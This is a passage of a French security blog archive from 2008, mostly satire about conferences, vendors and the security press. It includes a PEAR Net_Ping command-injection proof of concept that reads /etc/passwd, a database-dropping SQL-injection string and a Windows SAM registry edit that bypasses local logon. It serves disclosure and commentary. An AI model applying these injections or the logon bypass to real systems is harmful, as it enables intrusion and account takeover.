print "Score: %d" % count

Verdict: 44. On atteint le high score, mais sans le dépasser !

Vous noterez au passage le laconique :

- Outil : Nouvelle version de l'outil de tunnel sur DNS, dns2tcp v0.4.3.
http://www.hsc.fr/ressources/outils/dns2tcp/index.html.fr

En vérité, il s’avère que les versions 0.4.0, 0.4.1 et 0.4.2 étaient toutes vulnérables à des failles de sécurité, ce que n’indique pas vraiment le site de l’éditeur.

Le scénario est assez classique dans le monde de la sécurité : tout le monde se dit "c’est du sérieux, on peut avoir confiance" ou "quelqu’un a sûrement regardé, puisque c’est Open Source" (sic).

Puis un jour, survient l’integer overflow – et là, c’est le drame. Car cela signifie que ni le développeur, ni sa toolchain n’a connaissance de cette classe d’attaque. Et les bogues n’ont pas manqué de s’enchainer rapidement par la suite.

Il faut dire que le co-auteur de cet outil a été sévèrement châtié : il est désormais assigné à la formation "Développement sécurisé en PHP par la pratique". Personne n’a mérité ça, pas même les mainteneurs Debian.

En parlant de PHP, voici un exemple de code PEAR :

$ cat lol.php

require ("Net/Ping.php");
$count=1;
$host='127.0.0.1';
$ping = Net_Ping::factory();
$ping->setArgs(array('size' => 1, 'count' => $count));
$response = $ping->ping($host);
echo join("\r\n", $response->getRawData());
?>

$ php5 -f lol.php
PING 127.0.0.1 (127.0.0.1) 1(29) bytes of data.
9 bytes from 127.0.0.1: icmp_seq=1 ttl=64

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms

Et voici ce qu'il m'a fallu 5 minutes pour trouver lors d'un audit quelconque:

$ cat lol.php

require ("Net/Ping.php");
$count=1;
$host='127.0.0.1;head /etc/passwd';
$ping = Net_Ping::factory();
$ping->setArgs(array('size' => 1, 'count' => $count));
$response = $ping->ping($host);
echo join("\r\n", $response->getRawData());
?>

$ php5 -f lol.php
PING 127.0.0.1 (127.0.0.1) 1(29) bytes of data.
9 bytes from 127.0.0.1: icmp_seq=1 ttl=64

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh

Même dans la Livebox, on ne trouve plus ce genre de faille !

« Depuis que PHP a été inventé, je n’ai plus besoin de remplir mes rapports avec ‘le routeur a répondu à ICMP Timestamp’ ou ‘le serveur autorise la méthode non sécurisée TRACE’ » -- various pentesters.

On a frôlé le Big One(tm)

2008-09-10T22:01:00.004+02:00

... la question est: "lequel ?" :)

Je ne parle donc pas de la mise en service du LHC, mais bien de la cryptographie dans les versions françaises de Windows, qui par une sorte d'exception culturelle, a toujours été beaucoup plus faible.

On apprend donc dans cette note du CERTA qu'un patch est désormais disponible pour le Protected Storage. Contrairement au High Encryption Pack pour Windows 2000, ce patch s'applique également à Windows XP SP2 et 2003 qui disposaient encore de quelques portions de code "peu entropiques".

Voyons ce que cela donne sur un Windows XP SP2 FR complètement à jour. Nous allons pour cela utiliser l'outil gratuit PatchDiff2.

Après installation, un seul fichier est modifié: pstore.dll

Dans ce fichier, une fonction a été supprimée (IsEncryptionPermitted), une autre a été ajoutée. Soit.

Voyons maintenant les fonctions qui ont été modifiées: elles sont au nombre de 8.

Prenons la première: FMyEncryptKeyBlock. Un seul bloc fonctionnel a été modifié.

Même si vous ne lisez pas bien l'assembleur, je pense que vous avez une petite idée de ce qui se passe ...

Au fait, à quoi sert le Protected Storage ? A stocker un peu tous les mots de passe qui trainent ... Heureusement il est deprecated à partir de Vista.

En conclusion:

Difficile de se moquer de Debian après ça.
Il ne faut pas croire que "d'autres ont audité le binaire, et s'il y avait quelquechose ça se saurait".

A part ça quoi de neuf ? C'est presque la routine: patch Microsoft pour 5 failles GDI+, failles dans Wordpress, Apple QuickTime, mDNSResponder/Bonjour, Google Chrome ... Mais on attend toujours le Big One.

Bâches, suite (ou comment finir le challenge T2 en 2 minutes)

2008-09-07T19:00:00.000+02:00

Et oui, j'ai rattrapé quelques flux RSS de retard pendant ce week-end pluvieux :)

1. Tout d'abord le piratage. Il est responsable de tous les maux, comme d'habitude. Mais de là à déclarer:

(...) selon Henri Dumoulin, responsable de Pathé Nord. « Le piratage nous a joué un petit tour », a-t-il déclaré à l'AFP. « En 1998 (date de sortie de Titanic), il n'y avait pas d'internet à haut débit. »

... il y a un pas.

2. Un cas d'école de fuite d'information.

Pour alimenter sa chronique quotidienne, le SANS a demandé à ses lecteurs: "proposez nous des idées innovantes pour améliorer la sécurité d'Internet".

Je vous fait grâce de mon avis sur les réponses obtenues, par contre j'aime bien ce passage:

I am reminded as a result of reading your note on new Cyber strategies, about a place I used to work that constructed aerospace components for the many companies that offered their goods to the USA military machine. One of these devices were housings machined to contain the electronics which was capable of jamming the navigation signal of the French Exocet missile.

When the target, usually a ship, is acquired from the radar of the jet fighter, the navigation was transferred to the missile's gyro system so that once released from under the wing of the fighter, the missile was on it's own to reach it's designated target. Raytheon, a Canadian designer of anti aircraft and anti missile electronics developed a signal to send to the incoming missile that would instruct the missile to turn around and return to the jet from whence it came. Needless to say the pilot would have a sudden digestive problem once it became known the missile he just launched was coming back for a visit.

3. Et enfin, le challenge T2.

Pour mémoire, il s'agit d'un challenge annuel de reverse enginnering, qui attire chaque année un grand nombre de participants de qualité, même s'il n'y a rien à gagner (à part un aller-retour en Finlande). C'est probablement le manque du challenge Securitech qui se fait sentir :)

Le challenge 2008 a commencé samedi matin à 9h, heure française. L'objectif est un peu différent des années précédentes, puisque cette fois-ci l'objectif est de retrouver une adresse email cachée dans un Tetris 3D.

Par curiosité, je télécharge et je lance l'exécutable sur mon Vista 32-bits. Comme souvent avec ces challenges bourrés d'astuces Windows, rien ne se passe. Il y a probablement des valeurs spécifiques à Windows XP SP2 "en dur" dans le programme.

Toutefois un processus "challenge.exe" est présent en mémoire, Vista va donc me permettre (via le Task Manager) de créer un fichier de vidage au format "minidump applicatif".

A tout hasard, je cherche une adresse email (toujours faire simple avant de chercher compliqué ;) :

C:\> strings -n 8 Challenge.DMP | findstr @ | more

(...)

Please, contact support@oreans.com. Thank you!

(...)

Oreans.com ... Les auteurs du packer Themida ?

Il suffit d'attacher KD et de consulter le DebugView pour s'en rendre compte:

Waiting to reconnect...

Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE

Kernel Debugger connection established.

Symbol search path is: SRV*C:\WINDOWS\symbols*http://msdl.microsoft.com/download/symbols

Executable search path is:

Windows XP Kernel Version 2600 UP Free x86 compatible

Built by: 2600.xpsp_sp2_rtm.040803-2158

Kernel base = 0x804d7000 PsLoadedModuleList = 0x8055ab20

System Uptime: not available

ERROR: DavReadRegistryValues/RegQueryValueExW(4). WStatus = 5

ERROR: DavReadRegistryValues/RegQueryValueExW(5). WStatus = 5

ERROR: DavReadRegistryValues/RegQueryValueExW(6). WStatus = 5

SYNC:DriverEntry.

SYNC:DriverEntry - Done.

%s------------------------------------------------

--- Themida Professional ---

------------------------------------------------

watchdog!WdUpdateRecoveryState: Recovery enabled.

Et oui ! Cette année le challenge T2 consiste simplement à dumper un binaire protégé par Themida. Désolé les gars, mais si vous voulez une évaluation de votre protection commerciale par des experts du domaine, je peux vous envoyer une propale ...

Il pleut des bâches

2008-09-05T22:50:00.005+02:00

Petit florilège du vendredi soir ...

1. D'abord, l'une de mes banques en ligne.

Il semble qu'elle prenne très au sérieux le risque des malwares sur téléphones portables. Je ne me risquerai pas à dire qu'il s'agit de pur FUD, n'ayant pas toutes les cartes en main (si quelqu'un a déjà vu un virus mobile "en vrai", qu'il me contacte !).

Dans tous les cas, l'article est rédigé dans un style tellement technique qu'il rebutera immédiatement la moindre ménagère de moins de 50 ans.

Et surtout, avant qu'un téléphone soit suffisamment puissant pour pouvoir interpréter la page d'accueil de cette banque, il y a de la marge !

2. Ensuite, ce site de vulgarisation

Pour le coup, l'information est accessible au commun des mortels. Le graphisme est lêché, la mise en page est aérée, on sent qu'il y a du produit à vendre derrière (contrôle parental, antivirus, support sur site et tout le tremblement - on parle de pack 6-en-1 ici !).

Le partenariat avec F-Secure est difficile à rater. D'ailleurs vous pouvez même installer leur ActiveX.

Au final, le chaland n'a rien compris, mais il s'est fait peur avec la carte de propagation en temps réel de NSAnti.Packed ou VB.Trojan-Downloader. Et si mon pâté de maison était dans la zone d'infection du virus ?

3. Les consultants certifiés CISSP

Bon là c'est certes un peu facile. Mais comme le faisait remarquer un ami (lui-même CISSP), le nouveau certifié prête serment sur la Bible de suivre le code d'éthique du CISSP. Les valeurs de ce code sont simples: d'abord la patrie, ensuite le business.

D'ailleurs tout consultant CISSP a répondu lors de l'examen que s'il voyait son patron faire du P2P (et donc alimenter les caisses du terrorisme international en 2003 comme en 2008), il jouerait son rôle de whistleblower sans états d'âme.

Vous l'aurez compris, c'est une certification américaine.

4. Et pour finir, Hakin9 est arrivé

Il n'y a pas grand'chose à ajouter, si ce n'est qu'un pilier de la sécurité informatique française m'a récemment recommandé d'écrire dans Hakin9. Et qu'on ne dit pas "crypter" en français.

Free fail

2008-09-03T15:11:00.003+02:00

Espérons que l'infâme ' OR DROP DATABASE clients; -- ne se soit pas abonné chez Free !

C'est aujourd'hui ...

2008-08-31T13:14:00.003+02:00

La journée mondiale du blog !

Malheureusement, je n'ai pas eu le temps de beaucoup poster en août, compte-tenu de la charge de travail que représente le coaching de jeunes stagiaires plein d'allant, et d'une activité professionnelle somme toute soutenue pour la saison.

Notez que c'est un peu pareil pour Cédric, qui a déjà quelques conférences de retard dans ses compte-rendus.

En parlant de conférences, il semble que The Big One (comprenez la faille DNS de Kaminsky) a occulté une autre opération de communication pourtant assez rondement menée: le concours race to zero. Si vous avez complètement oublié de quoi il s'agit, et que vous n'avez pas pensé à aller voir les résultats, rassurez-vous: plusieurs équipes ont réussi à contourner tous les antivirus en quelques heures [1] [2].

Le détail amusant, c'est que ce concours était sponsorisé par un éditeur antivirus qui a pu se targuer de détecter tous les échantillons modifiés à l'aide de son produit. En effet, ce produit est basé sur le whitelisting d'exécutables ...

L'année prochaine, il n'y a qu'à organiser un concours race to zero day, et voir comment se comporte le produit en question face à une exploitation de faille tout en mémoire, ou de faille noyau ...

Décidément ces conférences américaines alimentent de plus en plus l'image Security Circus du métier !

Marketum Echecum

2008-08-22T09:23:00.002+02:00

Vu dans la newsletter des cinémas Pathé/Gaumont.

Enfin ça fait 3 ans que cette page est en ligne, donc de toute façon personne ne doit lire ces trucs là.

Message pour ceux qui pourraient se poser la question: c'est un passage des Métamorphoses d'Ovide.

Réflexions post-SSTIC

2008-08-06T16:35:00.001+02:00

Mise à jour du 7 août : Damien Aumaitre m'a contacté pour me dire que sa technique n'a rien de secrète. Du coup je publie la réponse complète :)

Et oui le SSTIC 2008, à l'échelle numérique, ça semble déjà appartenir au paléolithique ...

Mais voici deux questions issues de cette conférence auxquelles j'ai réfléchi par la suite:

1. Concernant l'extension Firefox malicieuse présentée en Rump Session, et dont le code n'a pas été diffusé (à ma connaissance), je suis tombé là dessus par hasard en lisant le dernier Hackers News Magazine (fear).

2. Concernant la modification de la base de registre permettant de contourner l'authentification Windows, présentée pendant la conférence de Damien Aumaitre, voici quelques explications.

Tout d'abord il faut savoir sous Windows que les comptes locaux sont gérés dans la base SAM. Cette base est visible dans la base de registre, les clés qui nous intéressent étant:
HKLM\SECURITY\SAM\Domains\Account\Users\

(Ces clés ne sont visibles que pour le compte SYSTEM par défaut, il vous faudra changer les permissions pour y avoir accès).

Ces clés contiennent deux valeurs binaires mystérieuses: F et V. En regardant SAMSRV.DLL (avec les symboles de débogage), on se rend compte que ces clés sont nommées en interne _SampFixedAttributeName et _SampVariableAttributeName, ce qui est un peu plus explicite.

Parmi les quelques fonctions qui référencent ces chaines, on trouve la fonction CreateUser() qui permet de reconstituer l'essentiel de la structure de ces clés.

La structure F est de la forme:
ULONG version;
ULONG unk1;
time_t LastLogon;
time_t LastLogoff;
time_t LastPasswordSet;
time_t ExpirationDate;
time_t LastPasswordFailed;
ULONG uid;
ULONG gid;
ULONG options;
// différents compteurs (ex. login attempts) ?
USHORT unk2;
USHORT unk3;
[...]

Rien d'intéressant a priori. La structure V est un peu plus complexe, puisque de taille variable. Elle commence par une liste de structures de type:
ULONG offset;
ULONG length;
ULONG additional_data; // souvent zéro

Puisque viennent les données proprement dites, comme le nom d'utilisateur, la description du compte, les hashes (chiffrés), etc.

La manipulation de la SAM est effectuée par des API telles que RtlAddAttributeActionToRXact(), RtlAddActionToRXact(), RtlApplyRXact(). Ces API garantissent que la modification de la base de registre, et donc la création du compte, s'effectuera de manière unitaire.

Inutile d'aller plus loin dans l'analyse, puisque tout est documenté sur ce site (attention, la mise en page pique un peu les yeux* :). Voici les liens directs vers la clé F et la clé V.

[*] Pas autant qu'un post d'Ivanlef0u, mais presque.

Dans mon souvenir, la manipulation consistait à remplacer un octet 0x14 par un octet 0x04 dans la clé V. Echec.

En fait, l'auteur me signale qu'il faut remplacer les deux valeurs aux offsets 0xA0 et 0xAC, ce qui a pour effet de dire au système que les hashs LM et NTLM sont de longueur nulle. Et là, "ça marche chez moi" (Windows XP SP2 FR / Workgroup / Fast User Switching).

PS. Je me demande bien à quoi sert la fonction _SampFixBug18471()

PPS. Inutile de paniquer sur la présence d'une variable globale _SampSecretEncryptionEnabled, c'est juste pour dire que SYSKEY est activé.

Marketing fail

2008-08-05T20:01:00.003+02:00

Vu dans la newsletter Nature & Découvertes:

Pour info, le Tarpé est une bâche, en fait.

PS. Vous pouvez me trouver sur Twitter maintenant. Web 2.0 forever.

PPS. Promis je prépare des posts techniques et intéressants pour bientôt :)

Les backdoors dans Skype

2008-07-27T09:48:00.003+02:00

Un récent article au titre racoleur prétend qu'il existe des backdoors dans Skype, permettant aux forces de police d'écouter les conversations.

Au delà du FUD, il me semble évident (compte-tenu des informations disponibles publiquement) qu'il est possible d'écouter une conversation Skype.

Parmi les arguments qui plaident en faveur de cette hypothèse:

La présence de failles exploitables à distance dans le logiciel. Dont la nôtre :)

Ceci dit, même si les polices française et allemande (entre autres) ont des velléités de "piratage légal", un ex-français travaillant dans la sécurité informatique offensive pourrait confirmer que les "services" sont encore loin du "remote 0day dans Skype" ...

Le mécanisme d'authentification, basé sur une signature RSA, repose sur le jeu de clés Skype.

Il a déjà été démontré (cf. slides 101+) que le remplacement de ces clés dans un client Skype "malveillant" (par exemple, via la fonction de mise à jour automatique[*]) permettait de faire tourner un réseau totalement indépendant du réseau "officiel". Le point de connexion entre le réseau "officiel" et le réseau "parallèle" simule un client Skype et peut avoir accès à toutes les communications en clair (attaque en homme du milieu).

Bien entendu si Skype coopère en donnant accès à ses clés privées, c'est encore plus simple.

Le système de plugins permettant d'étendre les fonctionnalités du logiciel n'est pas sûr.

En effet, lors de l'ajout d'un nouveau plugin, une confirmation utilisateur est demandée. Mais cette confirmation ne fait qu'ajouter une entrée dans la liste des plugins, authentifiée par un "code de validation". Ce code n'est en aucun cas une signature, et n'importe qui connaissant l'algorithme peut le recalculer. Un malware pourrait donc installer silencieusement un plugin Skype.

Compte-tenu des conférences passées présentant les méthodes de travail de la police, la solution du piégeage semble être la plus couramment utilisée.

Enfin, de nombreux pays imposent aux opérateurs télécom la mise en place d'un mécanisme de Lawful Interception. On ne voit pas pourquoi une société américaine aussi importante (Skype est une société du groupe eBay) pourrait décider de se soustraire à cette obligation.

Maintenant chacun fait ce qu'il veut. Mais vous ne pourrez pas dire que vous ne saviez pas.

La question qui reste en suspens est: y a-t-il une bonne vieille backdoor dans Skype, permettant de prendre le contrôle de n'importe quel client à distance ? Un simple netstat -an devrait permettre de répondre à cette question ;)

[*] La fonction de mise à jour automatique est une simple connexion HTTP. Par exemple chez moi:

GET /ui/0/3.6.0.216/fr/getnewestversion?ver=3.6.0.216&uhash=1b37a59b72b99a9ff8158cb6e084efb86 HTTP/1.1
User-Agent: Skype. 3.6
Host: ui.skype.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Sun, 27 Jul 2008 12:40:59 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=fr:TM=1217162459:TS=1217162459:TZ=:VER=0/3.6.0.216/0; expires=Mon, 27-Jul-09 12:40:59 GMT; path=/; domain=.skype.com;
Content-Length: 9
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

3.8.0.139

Il n'est toujours pas content

2008-07-14T22:00:00.000+02:00

(Suite du message précédent, car j'ai oublié de citer quelques personnes qui me font rire - personnes morales, je vous rassure :)

La newsletter de mon opérateur mobile

Je me suis toujours demandé si les témoignages clients glissés dans les encarts publicitaires étaient totalement bidonnés (texte et photo), ou juste un peu. Vous voyez de quoi je veux parler : les encarts dans lesquels Michel H., 52 ans, cadre en région parisienne, se dit "accro de la 3G" par exemple.

Mon opérateur mobile fait la même chose, mais avec des stars. Ce mois-ci c'est Zazie qui s'y colle. Et je ne sais pas si c'est le service com' qui a écrit l'interview, mais en tout cas quelqu'un s'est bien raté.

La newsletter de ma banque

Echec également. Il s'agissait de promouvoir la banque par téléphone portable.

Les utilisateurs de Word

Oui les utilisateurs de Word m'exaspèrent ! Enfin les 98%[*] d'utilisateurs (ça ne vous concerne donc peut-être pas, cher lecteur :) qui se sont retrouvés avec le pack Office installé sur leur PC acheté en grande surface, et qui ont grossi la base des "utilisateurs de Word".

[*] Chiffre approximatif

Le drame, c'est qu'un document Word d'une certaine taille (pas celle d'un CV, mais celle d'un document d'analyse de risques par exemple) sans numérotation automatique, sans styles prédéfinis, sans signets et références, et autres fonctions clés du logiciel c'est juste ... impossible à modifier.

Au moins avec \LaTeX, on peut être sûr que tout utilisateur ne l'est pas devenu par hasard ... (je vous rassure, un document \LaTeX est également impossible à modifier si on ne dispose pas de tous les paquets installés sur le poste de l'utilisateur qui a compilé le document en dernier).

Le dernier Hakin9 sur le thème "Data Recovery"

Non en fait il n'est pas mal :) Il y a quelques articles qui tiennent tout à fait la route.

Il n'y a que deux problèmes avec ce magazine : quand ils font appel à des étudiants pour boucler, ou quand ils font appel à des étudiants pour traduire.

Dans le premier cas, ça donne des choses comme "si comme moi vous avez perdu votre table de partitions un matin en vous réveillant, vous pouvez utiliser FileRecovery Pro ou TestDisk pour récupérer vos fichiers". Sachant que le premier est un outil Windows coûtant au bas mot $100, et que le deuxième est inutilisable si Curses n'évoque pour vous qu'un sort niveau 4 à Eye of the Beholder. Aucune explication sur les principes, même généraux, de la récupération de données. Une introduction "I love Linux", suivie d'une liste de produits sous Windows. Au final, un article qui sera périmé dès que les logiciels cités auront changé de version.

(A titre personnel je recommande vivement TestDisk et PhotoRec, qui m'ont sauvé la vie plusieurs fois).

Dans le deuxième cas, ça donne des choses comme (je cite mot pour mot) :

"LDAP est un protocole qui peut être supporté par différentes technologies, telles que XML ou les bases de données traditionnelles."

Ou :

"[...] d'énormes rainbow tables qui peuvent être mis à mal avec des technologies de type torrent."

Quoique dans certains cas, on se demande si l'erreur est réellement imputable au traducteur ...

Il revient ... et il n'est pas content !

2008-07-12T13:53:00.003+02:00

Et oui je suis de retour après pas mal d'activités diverses. Mais j'ai aussi eu le temps de m'énerver sur l'actualité récente.

La "faille" DNS

Je ne m'avancerai pas sur le fait de savoir si Dan Kaminsky a trouvé une faille sérieuse dans le protocole DNS ou l'une de ses utilisations (contrairement à d'autres [1][2]). Mais en lisant les blogs, il est amusant de constater que tout le monde prétend avoir trouvé cette faille (D.J.Bernstein, Amit Klein, et même un stagiaire du SANS) ... alors qu'on ne sait même pas encore de quoi il s'agit !

Been there, done that.

La "qualité" de l'Open Source

Ou comment laisser un bug 33 ans dans un logiciel que tout le monde a utilisé au moins une fois (ne serait-ce qu'à l'école), à savoir YACC.

Le dernier MISC

Un bon opus, même si la virologie reste un sujet de laboratoire, assez loin des préoccupations actuelles des RSSI. Du coup la diversité des auteurs s'en ressent. Notez bien qu'on pourrait dire la même chose du dernier SSTIC. Mais je ne l'ai pas dit :)

Il faudra quand même que je me fasse confirmer (ou infirmer) que la traduction de l'anglais malicious est "malveillant", et non pas "malicieux". En tout cas d'après Google Translate.

Ceci dit, je n'ai jamais compris non plus la différence entre une "problématique" et un "problème", entre "un écart qui nécessite des mesures correctives rapides" et "un projet complètement planté", et toutes ces subtilités de la Novlangue.

Je réserve mon avis sur Hakin9 pour plus tard (je ne l'ai pas encore ouvert).

Les Call Centers

En complément à la technique du Grey Listing, la technique de l'Early Abort : si au bout de 3 secondes votre interlocuteur n'a pas dit "allo" et que vous n'entendez qu'un bruit de fond continu, RACCROCHEZ C'EST UN PIEGE ! En effet la numérotation dans les Call Centers est automatique ; lorsque la ligne décroche l'appel est transféré vers un télévendeur - ce qui induit un lag (perceptible) de 3-4 secondes.

La sécurité des présidents

Et oui c'est le sommet de l'Union pour la Méditérannée ce week-end. 18,000 policiers sont mobilisés. Et j'ai pris 2 PV de stationnement en 1h30. A ce prix là les terroristes vont avoir du mal à garer une voiture piégée s'ils n'ont pas pris le stationnement résidentiel !

Vive le mois d'août et sa gratuité ...

Appel à témoins

2008-07-04T13:51:00.002+02:00

Désolé pour le manque d'activité sur ce blog, j'essaie de préparer des articles plus techniques que d'habitude mais c'est beaucoup plus long (mes stagiaires en savent quelquechose :).

L'objet initial de ce billet est le suivant : "j'ai un ami qui cherche des traces PCAP de communications WiFi enregistrées entre septembre 2006 et mai 2008, particulièrement lors de conférences de sécurité type SSTIC".

Si vous avez ça sous la main, vous pouvez me contacter par un commentaire.

Le plus strict anonymat sera respecté :)

YACRS'08

2008-06-09T07:01:00.003+02:00

Et oui, Yet Another Compte-Rendu du SSTIC 2008 ...

Je ne vais pas vous embêter avec le contenu des confs, vu le nombre de billets traitant déjà du sujet (certains inaugurant le live blogging). On notera que l'effet bisounours joue à fond, difficile de trouver un billet descendant complètement une conf', comme ce fût le cas les années passées.

Parlons plutôt de l'esprit général de SSTIC, car comme dirait l'autre, "c'était mieux avant".

Une chose frappante, qui s'est transformée en blague récurrente, c'est l'absence de publication d'outils cette année. La peur du gendarme est-elle passée par là ? Il est vrai qu'ils étaient nombreux dans la salle, et a priori très compétents ...

A SSTIC, on trouvait habituellement deux types de conférences :

Les conférences de culture générale, sur des sujets obscurs et/ou non techniques. Cette année on pourra citer la sécurité des détecteurs de feux de forêt, ou les attaques informationnelles.
Les conférences techniques, sur des sujets pointus, que l'orateur est souvent le seul à avoir travaillé aussi profondément, et qui débouchent sur des découvertes ou des outils puissants. Dans le passé, il y a eu la conférence de Nicolas Pouvesle sur les RPC Windows, ou la conférence d'Aurélien Bordes sur l'authentification Windows.

Cette année, une troisième race de conférence s'est taillée la part du lion : la conférence technique, sur un sujet déjà largement connu, et dont les seules avancées (en général un outil puissant) ne sont pas destinées à être publiées. Et personnellement, je ne vois pas trop l'intérêt de jouer au meilleur debugger ou à la meilleure libdisasm ...

Je passe sur l'intervention de la DCSSI à propos de la SSI en France. Chaque planche était un troll, pour ainsi dire ...

Sinon en vrac :

Les treillis n'étaient pas très visibles cette année.
D'ailleurs on sent que le public a changé, car poser des questions semble être devenu un motif d'opprobre. Même Hervé s'est tenu à carreau devant Marcus.
La jeune génération arrive. Ca se voit dans les greet'z et dans les Chocapic'z.
L'Asus EEE 700 a bien marché en France. Vraiment.
mDNS, c'est pire que NetBIOS. Vraiment.
Mention spéciale à Nikoteen, le seul à avoir publié ses travaux sous licence 4.

En conclusion, je ne regrette jamais d'être allé au SSTIC car il y a des moments épiques (souvent nocturnes). Mais je ne reviens pas voir mon patron ce lundi matin avec beaucoup de choses à lui montrer ... Espérons qu'il me rembourse quand même le voyage !

PS. Ces propos sont librement diffusables sous licence LDP :)

Pot pourri

2008-05-31T21:47:00.002+02:00

La semaine dernière a été chargée, pour cause d'audit. Encore un grand moment de bonheur, dont je réserve les meilleures feuilles aux amateurs de cocktails de fruits (que mon chef soit rassuré s'il me lit, aucun secret professionnel n'est trahi à cette occasion ;).

Comme je ne peux rien raconter de mes activités (contrairement à d'autres), je vais me contenter de ce que je fais le mieux, à savoir bâcher :)

Tout d'abord le compte-rendu de la journée Vista du GuWiV m'a mis en joie : [...] Les "retours vers XP" représentent une frange infime des utilisateurs et relève plus du buzz geeko-journalistique que d'une réalité de terrain. [...]
Toujours dans ce même compte-rendu, je tombe sur le site d'un participant émérite du groupe SharePoint France. Très Web 2.0 isn't it ?
Saviez-vous qu'il existe mieux que la "fameuse" norme ISO 27001 ? Je veux parler de ISO 29147, la norme du ... responsible disclosure. On s'inscrit où pour être certifié ?
Voici quelques sociétés dont je peux librement parler, puisqu'elles m'ont envoyé un authentique spam. La première c'est Ergonomiko : franchement, vous trouvez leur site ergonomique ? La deuxième (dont je tairai le nom) propose une sensibilisation à la sécurité en ligne : SecureMan.
Pour ceux qui ont déjà entendu parlé de Windows Home Server (tout un concept), sachez que le système est totalement inutilisable si vous avez plus d'un disque dur. Le tout à cause de la gestion des Alternate Data Streams (comme quoi ça sert à quelque chose cette feature !). Il faut attendre le Power Pack 1 (sans rire).

Passons maintenant à mon sujet favori : les conférences de sécurité. La semaine prochaine vous aurez le choix entre SSTIC'08 et des séminaires Technet. Personnellement je me rends à SSTIC, car on m'a vendu ça :

Par la suite, un complice interne m'a signalé qu'on aurait plutôt son voisin sur les genoux cette année ...

Si vous avez encore le courage après ça, vous pouvez rempiler sur la Nuit du Hack (14/15 juin) puis HackerSpaceFest (16/22 juin). Ca fera quelques Miles en plus sur le passe Navigo ... ou pas.

PS. Inutile de me harceler par mail, le forum de "hackers" fermé par la police cette semaine, c'est celui-là (source: l'Underground).

Compte-rendu de la JSSI 2008

2008-05-28T07:00:00.002+02:00

La Journée Sécurité organisée par l'OSSIR (JSSI) s'est tenue jeudi dernier à Paris.

Cette année le thème était "Anonymat, vie privée et gestion d'identité". Un sujet qui ne m'évoque absolument rien, d'autant que les conférences étaient plus orientées "santé" que "Web 2.0". J'y allais donc "pour voir".

Je dois dire que grâce à des intervenants de qualité, je ne me suis pas ennuyé (même si aucun des sujets abordés ne me sera d'une quelconque utilité professionnelle immédiate). Parmi les points mémorables de la journée :

La plaidoirie de Maitre Bensoussan.
"Le secret médical, ça commence par ne pas appeler les patients par leur nom dans la salle d'attente".
"Le commercial était chaud comme une baraque à frites" - en parlant du Data Loss (ou Leak) Prevention, le nouveau truc à la mode. Note : contrairement aux IDS, là on est sûr dès le début qu'une solution technique de DLP n'a aucun sens.
"Dans une omelette au lard, la poule est concernée, mais le cochon est impliqué".

J'ai pu également noter au cours de quelques conférences récentes que le système informatique de l'éducation nationale est réellement à la pointe des nouvelles technologies. Par exemple :

VPN IPSEC site à site entre des milliers de sites, certains à travers des liaisons lentes et peu fiables (ex. Saint Pierre et Miquelon).
Hébergement de milliers de sites utilisateurs, non administrés et souvent écrits en PHP, avec 1,5 million de hits par jour.
Roaming WiFi à l'échelle mondiale.
Fédération d'identité à une échelle trans-nationale.

Ca laisse rêveur quand on voit la complexité du déploiement d'un WiFi Guest dans la plupart des grandes entreprises françaises ...

Le clou de la journée reste quand même le réseau WiFi du site (je ne parle pas du hotspot Orange, mais bien du SSID local, probablement à usage privé).

Constatant une performance anormalement basse sur la bande WiFi, je suspecte tout d'abord un problème radio ou un abus de ressources. Après un rapide monitoring du trafic ambiant, il n'en est rien : la cause du problème est une émission massive (plusieurs centaines par seconde) de requêtes ARP (identifiables par leur taille) sur le réseau local protégé en ... WEP.

Cette consommation de bande passante durant au-delà du raisonnable (plusieurs heures !), je fais le tour des rares personnes ayant un laptop sur les genoux (on n'est pas au SSTIC), puis je filtre sur le critère laptop sous Linux.

Le coupable est identifié : c'est un consultant travaillant dans une société réputée en matière de sécurité WiFi (elle est passée sur TF1, c'est dire). Non seulement ce consultant n'utilise pas AirCrack en mode -ptw, mais surtout ... il n'a jamais trouvé que la clé WEP ne faisait que 64 bits !

Annonce légale

2008-05-25T22:47:00.003+02:00

Je connais quelqu'un qui vend une place pour SSTIC'08, toutes options, état neuf, prix coûtant. Donc n'hésitez pas à me contacter par mail ou dans les commentaires : premier arrivé, premier servi.

PS#0 Cet article de Réseaux et Télécoms m'a bien fait rire :
Certification 27001 : Les RSSI de grands groupes disent non merci !

PS#1 Je suis toujours fasciné par cette bannière publicitaire qui tourne sur le site de SecuObs depuis quelques mois :

Who needs VPN4U Services ? Hotspot Wireless Users at risk of having personal datas stolen like passwords ! Home Internet Users, Cable and DSL providers don't filtering exploits ! International Internet Users living where Governments prevent users from enjoying Internet, USA IP = no controls ! 36 USD/year

PS#2 Je vous laisse savourer cette perle sur l'underground (un sujet à la mode en ce moment), lue dans le Hacker News Magazine de novembre dernier. Notez bien qu'il n'est pas question de Paradis du Fruit :)

"Sans la liberté de blâmer, il n'est point d'éloge flatteur"

2008-05-19T07:00:00.000+02:00

Pas beaucoup d'activité sur ce blog en ce moment, c'est probablement signe que je prépare activement ma rump session du SSTIC [*]

Mais j'ai quand même pris le temps de lire la presse sécurité bi-mensuelle ce week-end. Et il faut bien l'admettre : le dernier Hakin9 est ... pas mal du tout !

Qu'est-ce qui a changé ? Tout ! (Y compris la mise en page d'ailleurs)

Les auteurs sont de langue française, c'est donc la fin des traductions hasardeuses.
Les auteurs sont des professionnels, ayant travaillé dans le domaine dont ils parlent. Les articles sont structurés et apportent une vraie valeur ajoutée (fini les articles d'étudiants découvrant l'injection de DLL).
